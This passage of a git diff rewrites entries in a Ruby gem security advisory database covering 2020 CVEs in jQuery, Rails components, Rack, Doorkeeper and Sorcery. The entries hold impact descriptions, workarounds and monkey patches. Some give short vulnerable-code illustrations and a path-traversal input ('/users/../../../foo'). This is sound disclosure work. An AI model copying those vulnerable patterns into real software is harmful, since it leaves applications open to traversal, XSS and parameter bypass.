+    jQuery.htmlPrefilter = function( html ) {
+      return html;
+    };
+    ```
+    You need to use at least jQuery 1.12/2.2 or newer to be able to
+    apply this workaround.
+
+    ### References
+    https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
+    https://jquery.com/upgrade-guide/3.5/
+
+    ### For more information
+    If you have any questions or comments about this advisory, search
+    for a relevant issue in
+    [the jQuery repo](https://github.com/jquery/jquery/issues).
+
+    If you don't find an answer, open a new issue."
+  cvss_v2: 4.3
+  cvss_v3: 6.9
+  unaffected_versions:
+  - "< 1.2.0"
+  patched_versions:
+  - ">= 3.5.0"
+  related:
+    url:
+    - https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2
+    - https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77
+    - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
+    - https://jquery.com/upgrade-guide/3.5/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11022
+    - https://security.netapp.com/advisory/ntap-20200511-0006/
+    - https://www.drupal.org/sa-core-2020-002
+    - https://www.debian.org/security/2020/dsa-4693
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/
+    - https://www.oracle.com/security-alerts/cpujul2020.html
+    - http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html
+    - https://security.gentoo.org/glsa/202007-03
+    - http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html
+    - https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133@
+    - https://github.com/advisories/GHSA-gxr4-xjj5-5px2
+    - https://www.npmjs.com/advisories/1518
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/
+    - https://www.oracle.com/security-alerts/cpuoct2020.html
+    - https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@
+    - https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@
+    - http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html
+    - https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@
+    - https://www.tenable.com/security/tns-2020-10
+    - https://www.tenable.com/security/tns-2020-11
+    - https://www.oracle.com/security-alerts/cpujan2021.html
+    - https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@
+    - https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@
+    - https://www.tenable.com/security/tns-2021-02
+    - https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html
+    - http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html
+    - https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@
+    - https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@
+    - https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@
+    - https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@
+    - https://www.tenable.com/security/tns-2021-10
+    - https://www.oracle.com/security-alerts/cpuApr2021.html
+    - https://www.oracle.com//security-alerts/cpujul2021.html
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@
+    - https://github.com/jquery/jquery/releases/tag/3.5.0
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://www.oracle.com/security-alerts/cpuapr2022.html
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html
+---
diff --git a/advisories/_posts/2020-04-29-CVE-2020-11023.md b/advisories/_posts/2020-04-29-CVE-2020-11023.md
index bda15a51..bd51dfb1 100644
--- a/advisories/_posts/2020-04-29-CVE-2020-11023.md
+++ b/advisories/_posts/2020-04-29-CVE-2020-11023.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2020-11023 (jquery-rails): Potential XSS vulnerability in jQuery'
-comments: false
-categories:
-- jquery-rails
-- rails
-advisory:
-  gem: jquery-rails
-  framework: rails
-  cve: 2020-11023
-  ghsa: jpcq-cgw6-v4j6
-  date: 2020-04-29
-  url: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released
-  title: Potential XSS vulnerability in jQuery
-  description: |
-    ## Impact
-
-    Passing HTML containing `<option>` elements from untrusted sources - even after
-    sanitizing them - to one of jQuery's DOM manipulation methods (i.e. `.html()`,
-    `.append()`, and others) may execute untrusted code.
-
-    ## Workarounds
-
-    To workaround this issue without upgrading, use DOMPurify with its
-    `SAFE_FOR_JQUERY` option to sanitize the HTML string before passing it to a
-    jQuery method.
-  cvss_v3: 6.9
-  patched_versions:
-  - ">= 4.4.0"
-  related:
-    url:
-    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#440
----
+---
+layout: advisory
+title: 'CVE-2020-11023 (jquery-rails): Potential XSS vulnerability in jQuery'
+comments: false
+categories:
+- jquery-rails
+- rails
+advisory:
+  gem: jquery-rails
+  framework: rails
+  cve: 2020-11023
+  ghsa: jpcq-cgw6-v4j6
+  date: 2020-04-29
+  url: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released
+  title: Potential XSS vulnerability in jQuery
+  description: |
+    ## Impact
+
+    Passing HTML containing `<option>` elements from untrusted sources - even after
+    sanitizing them - to one of jQuery's DOM manipulation methods (i.e. `.html()`,
+    `.append()`, and others) may execute untrusted code.
+
+    ## Workarounds
+
+    To workaround this issue without upgrading, use DOMPurify with its
+    `SAFE_FOR_JQUERY` option to sanitize the HTML string before passing it to a
+    jQuery method.
+  cvss_v3: 6.9
+  patched_versions:
+  - ">= 4.4.0"
+  related:
+    url:
+    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#440
+---
diff --git a/advisories/_posts/2020-05-02-CVE-2020-10187.md b/advisories/_posts/2020-05-02-CVE-2020-10187.md
index 3f41d042..aaabeb62 100644
--- a/advisories/_posts/2020-05-02-CVE-2020-10187.md
+++ b/advisories/_posts/2020-05-02-CVE-2020-10187.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2020-10187 (doorkeeper): Doorkeeper application secret information disclosure
-  vulnerability'
-comments: false
-categories:
-- doorkeeper
-advisory:
-  gem: doorkeeper
-  ghsa: j7vx-8mqj-cqp9
-  cve: 2020-10187
-  date: 2020-05-02
-  url: https://github.com/doorkeeper-gem/doorkeeper/security/advisories/GHSA-j7vx-8mqj-cqp9
-  title: Doorkeeper application secret information disclosure vulnerability
-  description: |
-    Information disclosure vulnerability. Allows an attacker to see all
-    Doorkeeper::Application model attribute values (including secrets) after
-    authorizing an application to their user.
-
-    An application is vulnerable if the authorized applications controller is
-    enabled (GET /oauth/authorized_applications.json).
-
-    Recommended additional hardening for >= 5.1 is to enable application secrets
-    hashing. This would render the exposed secret useless.
-  unaffected_versions:
-  - "< 5.0.0"
-  patched_versions:
-  - "~> 5.0.3"
-  - "~> 5.1.1"
-  - "~> 5.2.5"
-  - ">= 5.3.2"
-  cvss_v2: 5.5
-  cvss_v3: 5.4
-  related:
-    url:
-    - https://github.com/doorkeeper-gem/doorkeeper/commit/25d038022c2fcad45af5b73f9d003cf38ff491f6
----
+---
+layout: advisory
+title: 'CVE-2020-10187 (doorkeeper): Doorkeeper application secret information disclosure
+  vulnerability'
+comments: false
+categories:
+- doorkeeper
+advisory:
+  gem: doorkeeper
+  ghsa: j7vx-8mqj-cqp9
+  cve: 2020-10187
+  date: 2020-05-02
+  url: https://github.com/doorkeeper-gem/doorkeeper/security/advisories/GHSA-j7vx-8mqj-cqp9
+  title: Doorkeeper application secret information disclosure vulnerability
+  description: |
+    Information disclosure vulnerability. Allows an attacker to see all
+    Doorkeeper::Application model attribute values (including secrets) after
+    authorizing an application to their user.
+
+    An application is vulnerable if the authorized applications controller is
+    enabled (GET /oauth/authorized_applications.json).
+
+    Recommended additional hardening for >= 5.1 is to enable application secrets
+    hashing. This would render the exposed secret useless.
+  unaffected_versions:
+  - "< 5.0.0"
+  patched_versions:
+  - "~> 5.0.3"
+  - "~> 5.1.1"
+  - "~> 5.2.5"
+  - ">= 5.3.2"
+  cvss_v2: 5.5
+  cvss_v3: 5.4
+  related:
+    url:
+    - https://github.com/doorkeeper-gem/doorkeeper/commit/25d038022c2fcad45af5b73f9d003cf38ff491f6
+---
diff --git a/advisories/_posts/2020-05-05-CVE-2020-8151.md b/advisories/_posts/2020-05-05-CVE-2020-8151.md
index b6f18d32..5f1c1cbc 100644
--- a/advisories/_posts/2020-05-05-CVE-2020-8151.md
+++ b/advisories/_posts/2020-05-05-CVE-2020-8151.md
@@ -1,58 +1,58 @@
----
-layout: advisory
-title: 'CVE-2020-8151 (activeresource): activeresource Gem for Ruby lib/active_resource/base.rb
-  element_path Lack of Encoding'
-comments: false
-categories:
-- activeresource
-advisory:
-  gem: activeresource
-  cve: 2020-8151
-  ghsa: 46j2-xjgp-jrfm
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/pktoF4VmiM8
-  title: activeresource Gem for Ruby lib/active_resource/base.rb element_path Lack
-    of Encoding
-  date: 2020-05-05
-  description: |
-    activeresource contains a lack of encoding flaw in the element_path function of
-    lib/active_resource/base.rb.
-
-    There is an issue with the way Active Resource encodes data before querying the back end server.  This encoding mechanism can allow specially crafted requests to possibly access data that may not be expected.
-
-    Impacted code will look something like this:
-
-    ```
-    require 'activeresource'
-
-    class Test < ActiveResource::Base
-      self.site = 'http://127.0.0.1:3000'
-    end
-
-    Test.exists?(untrusted_user_input)
-    ```
-
-    Where untrusted user input is passed to an Active Resource model.  Specially crafted untrusted input can cause Active Resource to access data in an unexpected way and possibly leak information.
-
-    Workarounds
-    -------------
-
-    For those that can't upgrade, the following monkey patch can be applied:
-
-    ```
-    module ActiveResource
-     class Base
-       class << self
-         def element_path(id, prefix_options = {}, query_options = nil)
-           check_prefix_options(prefix_options)
-
-           prefix_options, query_options = split_options(prefix_options) if query_options.nil?
-           "#{prefix(prefix_options)}#{collection_name}/#{URI.encode_www_form_component(id.to_s)}#{format_extension}#{query_string(query_options)}"
-         end
-       end
-     end
-    end
-    ```
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 5.1.1"
----
+---
+layout: advisory
+title: 'CVE-2020-8151 (activeresource): activeresource Gem for Ruby lib/active_resource/base.rb
+  element_path Lack of Encoding'
+comments: false
+categories:
+- activeresource
+advisory:
+  gem: activeresource
+  cve: 2020-8151
+  ghsa: 46j2-xjgp-jrfm
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/pktoF4VmiM8
+  title: activeresource Gem for Ruby lib/active_resource/base.rb element_path Lack
+    of Encoding
+  date: 2020-05-05
+  description: |
+    activeresource contains a lack of encoding flaw in the element_path function of
+    lib/active_resource/base.rb.
+
+    There is an issue with the way Active Resource encodes data before querying the back end server.  This encoding mechanism can allow specially crafted requests to possibly access data that may not be expected.
+
+    Impacted code will look something like this:
+
+    ```
+    require 'activeresource'
+
+    class Test < ActiveResource::Base
+      self.site = 'http://127.0.0.1:3000'
+    end
+
+    Test.exists?(untrusted_user_input)
+    ```
+
+    Where untrusted user input is passed to an Active Resource model.  Specially crafted untrusted input can cause Active Resource to access data in an unexpected way and possibly leak information.
+
+    Workarounds
+    -------------
+
+    For those that can't upgrade, the following monkey patch can be applied:
+
+    ```
+    module ActiveResource
+     class Base
+       class << self
+         def element_path(id, prefix_options = {}, query_options = nil)
+           check_prefix_options(prefix_options)
+
+           prefix_options, query_options = split_options(prefix_options) if query_options.nil?
+           "#{prefix(prefix_options)}#{collection_name}/#{URI.encode_www_form_component(id.to_s)}#{format_extension}#{query_string(query_options)}"
+         end
+       end
+     end
+    end
+    ```
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 5.1.1"
+---
diff --git a/advisories/_posts/2020-05-06-CVE-2020-8159.md b/advisories/_posts/2020-05-06-CVE-2020-8159.md
index af47a5f7..f87d0141 100644
--- a/advisories/_posts/2020-05-06-CVE-2020-8159.md
+++ b/advisories/_posts/2020-05-06-CVE-2020-8159.md
@@ -1,49 +1,49 @@
----
-layout: advisory
-title: 'CVE-2020-8159 (actionpack-page_caching): Arbitrary file write/potential remote
-  code execution in actionpack-page_caching'
-comments: false
-categories:
-- actionpack-page_caching
-advisory:
-  gem: actionpack-page_caching
-  cve: 2020-8159
-  ghsa: mg5p-95m9-rmfp
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/CFRVkEytdP8
-  title: Arbitrary file write/potential remote code execution in actionpack-page_caching
-  date: 2020-05-06
-  description: |
-    There is a vulnerability in the actionpack-page_caching gem that allows an attacker
-    to write arbitrary files to a web server, potentially resulting in remote code execution
-    if the attacker can write unescaped ERB to a view.
-
-    Versions Affected:  All versions of actionpack-page_caching (part of Rails prior to Rails 4.0)
-    Not affected:       Applications not using actionpack-page_caching
-    Fixed Versions:     actionpack-page_caching >= 1.2.1
-
-    Impact
-    ------
-
-    The Action Pack Page Caching gem writes cache files to the file system in
-    order for the front end webserver (nginx, Apache, etc) to serve the cached
-    file without making a request to the application server.  Paths contain what
-    is effectively user input can be used to manipulate the location of the cache
-    file.
-
-    For example "/users/123" could be changed to "/users/../../../foo" and this
-    will escape the cache directory.  Attackers can use this technique to
-    springboard to an RCE if they can write arbitrary ERb to a view folder.
-
-    Impacted code looks like this:
-
-    ```
-    class BooksController < ApplicationController
-      caches_page :show
-    end
-    ```
-
-    Where the `show` action of the `BooksController` may be vulnerable.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.2.1"
----
+---
+layout: advisory
+title: 'CVE-2020-8159 (actionpack-page_caching): Arbitrary file write/potential remote
+  code execution in actionpack-page_caching'
+comments: false
+categories:
+- actionpack-page_caching
+advisory:
+  gem: actionpack-page_caching
+  cve: 2020-8159
+  ghsa: mg5p-95m9-rmfp
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/CFRVkEytdP8
+  title: Arbitrary file write/potential remote code execution in actionpack-page_caching
+  date: 2020-05-06
+  description: |
+    There is a vulnerability in the actionpack-page_caching gem that allows an attacker
+    to write arbitrary files to a web server, potentially resulting in remote code execution
+    if the attacker can write unescaped ERB to a view.
+
+    Versions Affected:  All versions of actionpack-page_caching (part of Rails prior to Rails 4.0)
+    Not affected:       Applications not using actionpack-page_caching
+    Fixed Versions:     actionpack-page_caching >= 1.2.1
+
+    Impact
+    ------
+
+    The Action Pack Page Caching gem writes cache files to the file system in
+    order for the front end webserver (nginx, Apache, etc) to serve the cached
+    file without making a request to the application server.  Paths contain what
+    is effectively user input can be used to manipulate the location of the cache
+    file.
+
+    For example "/users/123" could be changed to "/users/../../../foo" and this
+    will escape the cache directory.  Attackers can use this technique to
+    springboard to an RCE if they can write arbitrary ERb to a view folder.
+
+    Impacted code looks like this:
+
+    ```
+    class BooksController < ApplicationController
+      caches_page :show
+    end
+    ```
+
+    Where the `show` action of the `BooksController` may be vulnerable.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.2.1"
+---
diff --git a/advisories/_posts/2020-05-07-CVE-2020-11052.md b/advisories/_posts/2020-05-07-CVE-2020-11052.md
index 0a60c5cf..ed152451 100644
--- a/advisories/_posts/2020-05-07-CVE-2020-11052.md
+++ b/advisories/_posts/2020-05-07-CVE-2020-11052.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2020-11052 (sorcery): Improper Restriction of Excessive Authentication
-  Attempts in Sorcery'
-comments: false
-categories:
-- sorcery
-advisory:
-  gem: sorcery
-  cve: 2020-11052
-  ghsa: jc8m-cxhj-668x
-  url: https://github.com/Sorcery/sorcery/security/advisories/GHSA-jc8m-cxhj-668x
-  date: 2020-05-07
-  title: Improper Restriction of Excessive Authentication Attempts in Sorcery
-  description: |
-    ### Impact
-    Brute force vulnerability when using password authentication via Sorcery.
-    The brute force protection submodule will prevent a brute force attack for
-    the defined lockout period, but once expired protection will not be re-enabled
-    until a user or malicious actor logs in successfully. This does not affect users
-    that do not use the built-in brute force protection submodule, nor users that use
-    permanent account lockout.
-
-    ### Patches
-    Patched as of version `0.15.0`.
-
-    ### Workarounds
-    Currently no workarounds, other than monkey patching the authenticate method
-    provided by Sorcery or upgrading to version `0.15.0`.
-  cvss_v3: 8.3
-  patched_versions:
-  - ">= 0.15.0"
----
+---
+layout: advisory
+title: 'CVE-2020-11052 (sorcery): Improper Restriction of Excessive Authentication
+  Attempts in Sorcery'
+comments: false
+categories:
+- sorcery
+advisory:
+  gem: sorcery
+  cve: 2020-11052
+  ghsa: jc8m-cxhj-668x
+  url: https://github.com/Sorcery/sorcery/security/advisories/GHSA-jc8m-cxhj-668x
+  date: 2020-05-07
+  title: Improper Restriction of Excessive Authentication Attempts in Sorcery
+  description: |
+    ### Impact
+    Brute force vulnerability when using password authentication via Sorcery.
+    The brute force protection submodule will prevent a brute force attack for
+    the defined lockout period, but once expired protection will not be re-enabled
+    until a user or malicious actor logs in successfully. This does not affect users
+    that do not use the built-in brute force protection submodule, nor users that use
+    permanent account lockout.
+
+    ### Patches
+    Patched as of version `0.15.0`.
+
+    ### Workarounds
+    Currently no workarounds, other than monkey patching the authenticate method
+    provided by Sorcery or upgrading to version `0.15.0`.
+  cvss_v3: 8.3
+  patched_versions:
+  - ">= 0.15.0"
+---
diff --git a/advisories/_posts/2020-05-12-CVE-2020-8161.md b/advisories/_posts/2020-05-12-CVE-2020-8161.md
index dbc2b7de..46b77713 100644
--- a/advisories/_posts/2020-05-12-CVE-2020-8161.md
+++ b/advisories/_posts/2020-05-12-CVE-2020-8161.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2020-8161 (rack): Directory traversal in Rack::Directory app bundled with
-  Rack'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2020-8161
-  ghsa: 5f9h-9pjv-v6j7
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/T4ZIsfRf2eA
-  title: Directory traversal in Rack::Directory app bundled with Rack
-  date: 2020-05-12
-  description: |
-    There was a possible directory traversal vulnerability in the Rack::Directory app
-    that is bundled with Rack.
-
-    Versions Affected:  rack < 2.2.0
-    Not affected:       Applications that do not use Rack::Directory.
-    Fixed Versions:     2.1.3, >= 2.2.0
-
-    Impact
-    ------
-
-    If certain directories exist in a director that is managed by
-    `Rack::Directory`, an attacker could, using this vulnerability, read the
-    contents of files on the server that were outside of the root specified in the
-    Rack::Directory initializer.
-
-    Workarounds
-    -----------
-
-    Until such time as the patch is applied or their Rack version is upgraded,
-    we recommend that developers do not use Rack::Directory in their
-    applications.
-  cvss_v3: 8.6
-  patched_versions:
-  - "~> 2.1.3"
-  - ">= 2.2.0"
----
+---
+layout: advisory
+title: 'CVE-2020-8161 (rack): Directory traversal in Rack::Directory app bundled with
+  Rack'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2020-8161
+  ghsa: 5f9h-9pjv-v6j7
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/T4ZIsfRf2eA
+  title: Directory traversal in Rack::Directory app bundled with Rack
+  date: 2020-05-12
+  description: |
+    There was a possible directory traversal vulnerability in the Rack::Directory app
+    that is bundled with Rack.
+
+    Versions Affected:  rack < 2.2.0
+    Not affected:       Applications that do not use Rack::Directory.
+    Fixed Versions:     2.1.3, >= 2.2.0
+
+    Impact
+    ------
+
+    If certain directories exist in a director that is managed by
+    `Rack::Directory`, an attacker could, using this vulnerability, read the
+    contents of files on the server that were outside of the root specified in the
+    Rack::Directory initializer.
+
+    Workarounds
+    -----------
+
+    Until such time as the patch is applied or their Rack version is upgraded,
+    we recommend that developers do not use Rack::Directory in their
+    applications.
+  cvss_v3: 8.6
+  patched_versions:
+  - "~> 2.1.3"
+  - ">= 2.2.0"
+---
diff --git a/advisories/_posts/2020-05-15-CVE-2020-8163.md b/advisories/_posts/2020-05-15-CVE-2020-8163.md
index 06e851e4..d0bdadf0 100644
--- a/advisories/_posts/2020-05-15-CVE-2020-8163.md
+++ b/advisories/_posts/2020-05-15-CVE-2020-8163.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2020-8163 (actionview): Potential remote code execution of user-provided
-  local names in ActionView'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2020-8163
-  ghsa: cr3x-7m39-c6jq
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/hWuKcHyoKh0
-  title: Potential remote code execution of user-provided local names in ActionView
-  date: 2020-05-15
-  description: |
-    There was a vulnerability in versions of Rails prior to 5.0.1 that would
-    allow an attacker who controlled the `locals` argument of a `render` call.
-
-    Versions Affected:  rails < 5.0.1
-    Not affected:       Applications that do not allow users to control the names of locals.
-    Fixed Versions:     4.2.11.2
-
-    Impact
-    ------
-
-    In the scenario where an attacker might be able to control the name of a
-    local passed into `render`, they can acheive remote code execution.
-
-    Workarounds
-    -----------
-
-    Until such time as the patch can be applied, application developers should
-    ensure that all user-provided local names are alphanumeric.
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 4.2.11.2"
----
+---
+layout: advisory
+title: 'CVE-2020-8163 (actionview): Potential remote code execution of user-provided
+  local names in ActionView'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2020-8163
+  ghsa: cr3x-7m39-c6jq
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/hWuKcHyoKh0
+  title: Potential remote code execution of user-provided local names in ActionView
+  date: 2020-05-15
+  description: |
+    There was a vulnerability in versions of Rails prior to 5.0.1 that would
+    allow an attacker who controlled the `locals` argument of a `render` call.
+
+    Versions Affected:  rails < 5.0.1
+    Not affected:       Applications that do not allow users to control the names of locals.
+    Fixed Versions:     4.2.11.2
+
+    Impact
+    ------
+
+    In the scenario where an attacker might be able to control the name of a
+    local passed into `render`, they can acheive remote code execution.
+
+    Workarounds
+    -----------
+
+    Until such time as the patch can be applied, application developers should
+    ensure that all user-provided local names are alphanumeric.
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 4.2.11.2"
+---
diff --git a/advisories/_posts/2020-05-18-CVE-2020-8162.md b/advisories/_posts/2020-05-18-CVE-2020-8162.md
index 48bbfd3a..af4e0f5b 100644
--- a/advisories/_posts/2020-05-18-CVE-2020-8162.md
+++ b/advisories/_posts/2020-05-18-CVE-2020-8162.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2020-8162 (activestorage): Circumvention of file size limits in ActiveStorage'
-comments: false
-categories:
-- activestorage
-- rails
-advisory:
-  gem: activestorage
-  framework: rails
-  cve: 2020-8162
-  ghsa: m42x-37p3-fv5w
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/PjU3946mreQ
-  title: Circumvention of file size limits in ActiveStorage
-  date: 2020-05-18
-  description: |
-    There is a vulnerability in ActiveStorage's S3 adapter that allows the Content-Length of a
-    direct file upload to be modified by an end user.
-
-    Versions Affected:  rails < 5.2.4.2, rails < 6.0.3.1
-    Not affected:       Applications that do not use the direct upload functionality of the ActiveStorage S3 adapter.
-    Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
-
-    Impact
-    ------
-
-    Utilizing this vulnerability, an attacker can control the Content-Length of an S3 direct upload URL without receiving a
-    new signature from the server. This could be used to bypass controls in place on the server to limit upload size.
-
-    Workarounds
-    -----------
-
-    This is a low-severity security issue. As such, no workaround is necessarily
-    until such time as the application can be upgraded.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 5.2.4, >= 5.2.4.3"
-  - ">= 6.0.3.1"
----
+---
+layout: advisory
+title: 'CVE-2020-8162 (activestorage): Circumvention of file size limits in ActiveStorage'
+comments: false
+categories:
+- activestorage
+- rails
+advisory:
+  gem: activestorage
+  framework: rails
+  cve: 2020-8162
+  ghsa: m42x-37p3-fv5w
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/PjU3946mreQ
+  title: Circumvention of file size limits in ActiveStorage
+  date: 2020-05-18
+  description: |
+    There is a vulnerability in ActiveStorage's S3 adapter that allows the Content-Length of a
+    direct file upload to be modified by an end user.
+
+    Versions Affected:  rails < 5.2.4.2, rails < 6.0.3.1
+    Not affected:       Applications that do not use the direct upload functionality of the ActiveStorage S3 adapter.
+    Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
+
+    Impact
+    ------
+
+    Utilizing this vulnerability, an attacker can control the Content-Length of an S3 direct upload URL without receiving a
+    new signature from the server. This could be used to bypass controls in place on the server to limit upload size.
+
+    Workarounds
+    -----------
+
+    This is a low-severity security issue. As such, no workaround is necessarily
+    until such time as the application can be upgraded.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 5.2.4, >= 5.2.4.3"
+  - ">= 6.0.3.1"
+---
diff --git a/advisories/_posts/2020-05-18-CVE-2020-8164.md b/advisories/_posts/2020-05-18-CVE-2020-8164.md
index 9ab38560..09ddfef1 100644
--- a/advisories/_posts/2020-05-18-CVE-2020-8164.md
+++ b/advisories/_posts/2020-05-18-CVE-2020-8164.md
@@ -1,57 +1,57 @@
----
-layout: advisory
-title: 'CVE-2020-8164 (actionpack): Possible Strong Parameters Bypass in ActionPack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2020-8164
-  ghsa: 8727-m6gj-mc37
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/f6ioe4sdpbY
-  title: Possible Strong Parameters Bypass in ActionPack
-  date: 2020-05-18
-  description: |
-    There is a strong parameters bypass vector in ActionPack.
-
-    Versions Affected:  rails <= 6.0.3
-    Not affected:       rails < 4.0.0
-    Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
-
-    Impact
-    ------
-    In some cases user supplied information can be inadvertently leaked from
-    Strong Parameters.  Specifically the return value of `each`, or `each_value`,
-    or `each_pair` will return the underlying "untrusted" hash of data that was
-    read from the parameters.  Applications that use this return value may be
-    inadvertently use untrusted user input.
-
-    Impacted code will look something like this:
-
-    ```
-    def update
-      # Attacker has included the parameter: `{ is_admin: true }`
-      User.update(clean_up_params)
-    end
-
-    def clean_up_params
-       params.each { |k, v|  SomeModel.check(v) if k == :name }
-    end
-    ```
-
-    Note the mistaken use of `each` in the `clean_up_params` method in the above
-    example.
-
-    Workarounds
-    -----------
-    Do not use the return values of `each`, `each_value`, or `each_pair` in your
-    application.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 4.0.0"
-  patched_versions:
-  - "~> 5.2.4, >= 5.2.4.3"
-  - ">= 6.0.3.1"
----
+---
+layout: advisory
+title: 'CVE-2020-8164 (actionpack): Possible Strong Parameters Bypass in ActionPack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2020-8164
+  ghsa: 8727-m6gj-mc37
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/f6ioe4sdpbY
+  title: Possible Strong Parameters Bypass in ActionPack
+  date: 2020-05-18
+  description: |
+    There is a strong parameters bypass vector in ActionPack.
+
+    Versions Affected:  rails <= 6.0.3
+    Not affected:       rails < 4.0.0
+    Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1
+
+    Impact
+    ------
+    In some cases user supplied information can be inadvertently leaked from
+    Strong Parameters.  Specifically the return value of `each`, or `each_value`,
+    or `each_pair` will return the underlying "untrusted" hash of data that was
+    read from the parameters.  Applications that use this return value may be
+    inadvertently use untrusted user input.
+
+    Impacted code will look something like this:
+
+    ```
+    def update
+      # Attacker has included the parameter: `{ is_admin: true }`
+      User.update(clean_up_params)
+    end
+
+    def clean_up_params
+       params.each { |k, v|  SomeModel.check(v) if k == :name }
+    end
+    ```
+
+    Note the mistaken use of `each` in the `clean_up_params` method in the above
+    example.
+
+    Workarounds
+    -----------
+    Do not use the return values of `each`, `each_value`, or `each_pair` in your
+    application.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 4.0.0"
+  patched_versions:
+  - "~> 5.2.4, >= 5.2.4.3"
+  - ">= 6.0.3.1"
+---
diff --git a/advisories/_posts/2020-05-18-CVE-2020-8165.md b/advisories/_posts/2020-05-18-CVE-2020-8165.md
index 830a16ed..8d319ba8 100644
--- a/advisories/_posts/2020-05-18-CVE-2020-8165.md
+++ b/advisories/_posts/2020-05-18-CVE-2020-8165.md
@@ -1,52 +1,52 @@
----
-layout: advisory
-title: 'CVE-2020-8165 (activesupport): Potentially unintended unmarshalling of user-provided
-  objects in MemCacheStore and RedisCacheStore'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2020-8165
-  ghsa: 2p68-f74v-9wc6
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/bv6fW4S0Y1c
-  title: Potentially unintended unmarshalling of user-provided objects in MemCacheStore
-    and RedisCacheStore
